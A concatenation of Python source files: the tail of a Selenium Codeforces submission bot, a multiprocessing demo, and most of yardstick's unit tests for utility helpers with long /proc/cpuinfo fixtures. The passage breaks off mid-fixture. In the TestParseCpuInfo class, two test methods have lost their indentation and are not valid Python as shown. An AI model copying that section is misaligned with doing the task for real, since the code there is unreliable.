        for problink in problems:
            problink.send_keys(Keys.CONTROL + Keys.ENTER)
        for i, c in enumerate(prob_codes):
            self.prept(c, i == 0)
        while driver.current_url != fr'https://codeforces.com/contest/{contestname}/submit':
            driver.get(fr'https://codeforces.com/contest/{contestname}/submit')
# Entry point: hand a codeforces bot instance to the interactive command
# loop provided by bot_cp.
if __name__ == '__main__':
    interface(bot_codeforces())
|
run_background_processes_no_daemons_sk.py | import multiprocessing
import time
def foo():
    """Print a five-step counter, one step per second.

    The process named 'bg_process' counts 0..4; any other process counts
    5..9.  Start/exit banners include the process name.
    """
    proc_name = multiprocessing.current_process().name
    print("Starting %s \n" % proc_name)
    start, stop = (0, 5) if proc_name == 'bg_process' else (5, 10)
    for counter in range(start, stop):
        print('---> %d \n' % counter)
        time.sleep(1)
    print("Exiting %s \n" % proc_name)
if __name__ == '__main__':
    # Launch both workers as non-daemon processes so the parent waits for
    # them to finish naturally.
    workers = [
        multiprocessing.Process(name='bg_process', target=foo),
        multiprocessing.Process(name='no_bg_process', target=foo),
    ]
    for worker in workers:
        worker.daemon = False
    for worker in workers:
        worker.start()
test_utils.py | ##############################################################################
# Copyright (c) 2015 Ericsson AB and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
from copy import deepcopy
import errno
import importlib
import ipaddress
from itertools import product, chain
import os
import socket
import time
import threading
import mock
import six
from six.moves import configparser
import unittest
import yardstick
from yardstick import ssh
from yardstick.common import constants
from yardstick.common import utils
from yardstick.common import exceptions
from yardstick.tests.unit import base as ut_base
class IterSubclassesTestCase(ut_base.BaseUnitTestCase):
    # Disclaimer: this class is a modified copy from
    # rally/tests/unit/common/plugin/test_discover.py
    # Copyright 2015: Mirantis Inc.
    def test_itersubclasses(self):
        """utils.itersubclasses must yield every transitive subclass of A."""
        class A(object):
            pass

        class B(A):
            pass

        class C(A):
            pass

        class D(C):
            pass
        # Per the assertion, subclasses are reported depth-first in definition
        # order: B, then C followed by C's own subclass D.
        self.assertEqual([B, C, D], list(utils.itersubclasses(A)))
class ImportModulesFromPackageTestCase(ut_base.BaseUnitTestCase):
    """Tests for utils.import_modules_from_package, with os.walk mocked so no
    real filesystem layout is required."""

    @mock.patch('yardstick.common.utils.os.walk')
    def test_import_modules_from_package_no_mod(self, mock_walk):
        """Directories containing only __init__.py / data files import nothing."""
        yardstick_root = os.path.dirname(os.path.dirname(yardstick.__file__))
        mock_walk.return_value = ([
            (os.path.join(yardstick_root, 'foo'), ['bar'], ['__init__.py']),
            (os.path.join(yardstick_root, 'foo', 'bar'), [], ['baz.txt', 'qux.rst'])
        ])
        utils.import_modules_from_package('foo.bar')

    @mock.patch('yardstick.common.utils.os.walk')
    @mock.patch.object(importlib, 'import_module')
    def test_import_modules_from_package(self, mock_import_module, mock_walk):
        """A walked baz.py is imported under its dotted path ('bar.baz') —
        note the os.pardir in the walked path collapses 'foo/../bar' to 'bar'."""
        yardstick_root = os.path.dirname(os.path.dirname(yardstick.__file__))
        mock_walk.return_value = ([
            (os.path.join(yardstick_root, 'foo', os.pardir, 'bar'), [], ['baz.py'])
        ])
        utils.import_modules_from_package('foo.bar')
        mock_import_module.assert_called_once_with('bar.baz')
class GetParaFromYaml(ut_base.BaseUnitTestCase):
    """Tests for constants.get_param against a sample YAML config file
    (the config path is injected by mocking os.environ.get)."""

    @mock.patch('yardstick.common.utils.os.environ.get')
    def test_get_param_para_not_found(self, get_env):
        """A key absent from the config must fall back to the supplied default."""
        file_path = 'config_sample.yaml'
        get_env.return_value = self._get_file_abspath(file_path)
        args = 'releng.file'
        default = 'hello'
        # BUG FIX: the original used assertTrue(value, default) — the second
        # positional argument of assertTrue is only the failure *message*, so
        # the test passed for ANY truthy return value and never compared it to
        # the default. assertEqual performs the intended comparison.
        self.assertEqual(constants.get_param(args, default), default)

    @mock.patch('yardstick.common.utils.os.environ.get')
    def test_get_param_para_exists(self, get_env):
        """A key present in the config must be returned as-is."""
        file_path = 'config_sample.yaml'
        get_env.return_value = self._get_file_abspath(file_path)
        args = 'releng.dir'
        para = '/home/opnfv/repos/releng'
        self.assertEqual(para, constants.get_param(args))

    def _get_file_abspath(self, filename):
        # Resolve the fixture file relative to this test module's directory.
        curr_path = os.path.dirname(os.path.abspath(__file__))
        file_path = os.path.join(curr_path, filename)
        return file_path
class CommonUtilTestCase(ut_base.BaseUnitTestCase):
    """Tests for assorted yardstick.common.utils helpers: dict flattening,
    key lookup with default, and relative-file opening (with open() mocked)."""

    def setUp(self):
        # Nested benchmark payload used by the flatten test below.
        self.data = {
            "benchmark": {
                "data": {
                    "mpstat": {
                        "cpu0": {
                            "%sys": "0.00",
                            "%idle": "99.00"
                        },
                        "loadavg": [
                            "1.09",
                            "0.29"
                        ]
                    },
                    "rtt": "1.03"
                }
            }
        }

    def test__dict_key_flatten(self):
        """flatten_dict_key joins nested keys with '.' and appends list
        indices to the key name (loadavg0, loadavg1)."""
        line = 'mpstat.loadavg1=0.29,rtt=1.03,mpstat.loadavg0=1.09,' \
               'mpstat.cpu0.%idle=99.00,mpstat.cpu0.%sys=0.00'
        # need to sort for assert to work
        line = ",".join(sorted(line.split(',')))
        flattened_data = utils.flatten_dict_key(
            self.data['benchmark']['data'])
        result = ",".join(
            ("=".join(item) for item in sorted(flattened_data.items())))
        self.assertEqual(result, line)

    def test_get_key_with_default_negative(self):
        """With no default supplied, a missing key raises KeyError."""
        with self.assertRaises(KeyError):
            utils.get_key_with_default({}, 'key1')

    # NOTE(review): the method name 'test_' looks like an accidental stub —
    # presumably meant something like test_find_relative_file_both_fail;
    # renaming it would keep it discovered by the test runner.
    @mock.patch('yardstick.common.utils.open', create=True)
    def test_(self, mock_open):
        """find_relative_file re-raises IOError after trying both candidate
        paths (hence exactly two open() calls)."""
        mock_open.side_effect = IOError
        with self.assertRaises(IOError):
            utils.find_relative_file('my/path', 'task/path')
        self.assertEqual(mock_open.call_count, 2)

    @mock.patch('yardstick.common.utils.open', create=True)
    def test_open_relative_path(self, mock_open):
        """open_relative_file: direct path first, then relative to the task
        path on ENOENT; non-ENOENT IOErrors propagate immediately."""
        mock_open_result = mock_open()
        mock_open_call_count = 1  # initial call to get result
        # Direct open succeeds: one call, path contains 'foo' but not 'bar'.
        self.assertEqual(utils.open_relative_file('foo', 'bar'), mock_open_result)
        mock_open_call_count += 1  # one more call expected
        self.assertEqual(mock_open.call_count, mock_open_call_count)
        self.assertIn('foo', mock_open.call_args_list[-1][0][0])
        self.assertNotIn('bar', mock_open.call_args_list[-1][0][0])

        # Direct open fails with ENOENT; only the bar/foo fallback succeeds.
        def open_effect(*args, **kwargs):
            if kwargs.get('name', args[0]) == os.path.join('bar', 'foo'):
                return mock_open_result
            raise IOError(errno.ENOENT, 'not found')

        mock_open.side_effect = open_effect
        self.assertEqual(utils.open_relative_file('foo', 'bar'), mock_open_result)
        mock_open_call_count += 2  # two more calls expected
        self.assertEqual(mock_open.call_count, mock_open_call_count)
        self.assertIn('foo', mock_open.call_args_list[-1][0][0])
        self.assertIn('bar', mock_open.call_args_list[-1][0][0])

        # test an IOError of type ENOENT
        mock_open.side_effect = IOError(errno.ENOENT, 'not found')
        with self.assertRaises(IOError):
            # the second call still raises
            utils.open_relative_file('foo', 'bar')
        mock_open_call_count += 2  # two more calls expected
        self.assertEqual(mock_open.call_count, mock_open_call_count)
        self.assertIn('foo', mock_open.call_args_list[-1][0][0])
        self.assertIn('bar', mock_open.call_args_list[-1][0][0])

        # test an IOError other than ENOENT
        mock_open.side_effect = IOError(errno.EBUSY, 'busy')
        with self.assertRaises(IOError):
            utils.open_relative_file('foo', 'bar')
        mock_open_call_count += 1  # one more call expected
        self.assertEqual(mock_open.call_count, mock_open_call_count)
class TestMacAddressToHex(ut_base.BaseUnitTestCase):
    """Tests for utils.mac_address_to_hex_list: valid conversion plus the two
    rejection paths (short MAC, non-numeric MAC)."""

    def test_mac_address_to_hex_list(self):
        expected = ['0xea', '0x3e', '0xe1', '0x9a', '0x99', '0xe8']
        self.assertEqual(utils.mac_address_to_hex_list("ea:3e:e1:9a:99:e8"),
                         expected)

    def test_mac_address_to_hex_list_too_short_mac(self):
        # Only four octets — must be rejected.
        with self.assertRaises(exceptions.InvalidMacAddress):
            utils.mac_address_to_hex_list("ea:3e:e1:9a")

    def test_mac_address_to_hex_list_no_int_mac(self):
        # Not hex digits at all — must be rejected.
        with self.assertRaises(exceptions.InvalidMacAddress):
            utils.mac_address_to_hex_list("invalid_mac")
class TranslateToStrTestCase(ut_base.BaseUnitTestCase):
    """Tests for utils.translate_to_str: unicode strings are converted to
    native str (recursively through dicts/lists); other objects pass through."""

    def test_translate_to_str_unicode(self):
        self.assertEqual('hello', utils.translate_to_str(u'hello'))

    def test_translate_to_str_dict_list_unicode(self):
        nested_unicode = {
            u'hello': {u'hello': [u'world']}
        }
        expected = {
            'hello': {'hello': ['world']}
        }
        self.assertEqual(expected, utils.translate_to_str(nested_unicode))

    def test_translate_to_str_non_string(self):
        # Non-string inputs must be returned unchanged (same object).
        marker = object()
        self.assertIs(marker, utils.translate_to_str(marker))
class TestParseCpuInfo(ut_base.BaseUnitTestCase):
def test_single_socket_no_hyperthread(self):
cpuinfo = """\
processor : 2
vendor_id : GenuineIntel
cpu family : 6
model : 60
model name : Intel Core Processor (Haswell, no TSX)
stepping : 1
microcode : 0x1
cpu MHz : 2294.684
cache size : 4096 KB
physical id : 0
siblings : 5
core id : 2
cpu cores : 5
apicid : 2
initial apicid : 2
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl eagerfpu pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat
bugs :
bogomips : 4589.36
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 3
vendor_id : GenuineIntel
cpu family : 6
model : 60
model name : Intel Core Processor (Haswell, no TSX)
stepping : 1
microcode : 0x1
cpu MHz : 2294.684
cache size : 4096 KB
physical id : 0
siblings : 5
core id : 3
cpu cores : 5
apicid : 3
initial apicid : 3
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl eagerfpu pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat
bugs :
bogomips : 4589.36
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 4
vendor_id : GenuineIntel
cpu family : 6
model : 60
model name : Intel Core Processor (Haswell, no TSX)
stepping : 1
microcode : 0x1
cpu MHz : 2294.684
cache size : 4096 KB
physical id : 0
siblings : 5
core id : 4
cpu cores : 5
apicid : 4
initial apicid : 4
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl eagerfpu pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat
bugs :
bogomips : 4589.36
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
"""
socket_map = utils.SocketTopology.parse_cpuinfo(cpuinfo)
self.assertEqual(sorted(socket_map.keys()), [0])
self.assertEqual(sorted(socket_map[0].keys()), [2, 3, 4])
def test_single_socket_hyperthread(self):
cpuinfo = """\
processor : 5
vendor_id : GenuineIntel
cpu family : 6
model : 60
model name : Intel(R) Xeon(R) CPU E3-1275 v3 @ 3.50GHz
stepping : 3
microcode : 0x1d
cpu MHz : 3501.708
cache size : 8192 KB
physical id : 0
siblings : 8
core id : 1
cpu cores : 4
apicid : 3
initial apicid : 3
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm epb tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt dtherm ida arat pln pts
bugs :
bogomips : 6987.36
clflush size : 64
cache_alignment : 64
address sizes : 39 bits physical, 48 bits virtual
power management:
processor : 6
vendor_id : GenuineIntel
cpu family : 6
model : 60
model name : Intel(R) Xeon(R) CPU E3-1275 v3 @ 3.50GHz
stepping : 3
microcode : 0x1d
cpu MHz : 3531.829
cache size : 8192 KB
physical id : 0
siblings : 8
core id : 2
cpu cores : 4
apicid : 5
initial apicid : 5
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm epb tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt dtherm ida arat pln pts
bugs :
bogomips : 6987.36
clflush size : 64
cache_alignment : 64
address sizes : 39 bits physical, 48 bits virtual
power management:
processor : 7
vendor_id : GenuineIntel
cpu family : 6
model : 60
model name : Intel(R) Xeon(R) CPU E3-1275 v3 @ 3.50GHz
stepping : 3
microcode : 0x1d
cpu MHz : 3500.213
cache size : 8192 KB
physical id : 0
siblings : 8
core id : 3
cpu cores : 4
apicid : 7
initial apicid : 7
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm epb tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt dtherm ida arat pln pts
bugs :
bogomips : 6987.24
clflush size : 64
cache_alignment : 64
address sizes : 39 bits physical, 48 bits virtual
power management:
"""
socket_map = utils.SocketTopology.parse_cpuinfo(cpuinfo)
self.assertEqual(sorted(socket_map.keys()), [0])
self.assertEqual(sorted(socket_map[0].keys()), [1, 2, 3])
self.assertEqual(sorted(socket_map[0][1]), [5])
self.assertEqual(sorted(socket_map[0][2]), [6])
self.assertEqual(sorted(socket_map[0][3]), [7])
def test_dual_socket_hyperthread(self):
    """Parse a two-socket /proc/cpuinfo sample that includes a hyperthreaded core.

    The sample lists processors 1, 2, 43, 44, 85, 86 and 87 across
    physical ids 0 and 1.  Core id 28 on physical id 1 appears twice
    (processors 43 and 87), i.e. two hyperthread siblings of one core,
    so the parsed map must collect both processors under that core.
    """
    # Verbatim /proc/cpuinfo capture; parse_cpuinfo reads the
    # "processor", "physical id" and "core id" fields of each stanza.
    cpuinfo = """\
processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.976
cache size : 56320 KB
physical id : 0
siblings : 44
core id : 1
cpu cores : 22
apicid : 2
initial apicid : 2
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4401.07
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 2
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1226.892
cache size : 56320 KB
physical id : 0
siblings : 44
core id : 2
cpu cores : 22
apicid : 4
initial apicid : 4
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4400.84
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 43
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.305
cache size : 56320 KB
physical id : 1
siblings : 44
core id : 28
cpu cores : 22
apicid : 120
initial apicid : 120
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4411.31
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 44
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.305
cache size : 56320 KB
physical id : 0
siblings : 44
core id : 0
cpu cores : 22
apicid : 1
initial apicid : 1
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4410.61
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 85
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.573
cache size : 56320 KB
physical id : 1
siblings : 44
core id : 26
cpu cores : 22
apicid : 117
initial apicid : 117
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4409.07
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 86
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.305
cache size : 56320 KB
physical id : 1
siblings : 44
core id : 27
cpu cores : 22
apicid : 119
initial apicid : 119
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4406.62
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 87
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.708
cache size : 56320 KB
physical id : 1
siblings : 44
core id : 28
cpu cores : 22
apicid : 121
initial apicid : 121
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4413.48
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
"""
    socket_map = utils.SocketTopology.parse_cpuinfo(cpuinfo)
    # Both physical packages were seen, each with three distinct core ids.
    self.assertEqual(sorted(socket_map.keys()), [0, 1])
    self.assertEqual(sorted(socket_map[0].keys()), [0, 1, 2])
    self.assertEqual(sorted(socket_map[1].keys()), [26, 27, 28])
    # Single-thread cores map to one processor each ...
    self.assertEqual(sorted(socket_map[0][0]), [44])
    self.assertEqual(sorted(socket_map[0][1]), [1])
    self.assertEqual(sorted(socket_map[0][2]), [2])
    self.assertEqual(sorted(socket_map[1][26]), [85])
    self.assertEqual(sorted(socket_map[1][27]), [86])
    # ... while the hyperthreaded core (socket 1, core 28) holds both siblings.
    self.assertEqual(sorted(socket_map[1][28]), [43, 87])
def test_dual_socket_no_hyperthread(self):
    """Check the processors()/cores()/sockets() accessors of the parsed map.

    Uses the same two-socket cpuinfo sample as the hyperthread test and
    verifies that the topology object reports the sorted, de-duplicated
    processor ids, core ids and socket ids.
    """
    # Verbatim /proc/cpuinfo capture; parse_cpuinfo reads the
    # "processor", "physical id" and "core id" fields of each stanza.
    cpuinfo = """\
processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.976
cache size : 56320 KB
physical id : 0
siblings : 44
core id : 1
cpu cores : 22
apicid : 2
initial apicid : 2
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4401.07
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 2
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1226.892
cache size : 56320 KB
physical id : 0
siblings : 44
core id : 2
cpu cores : 22
apicid : 4
initial apicid : 4
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4400.84
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 43
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
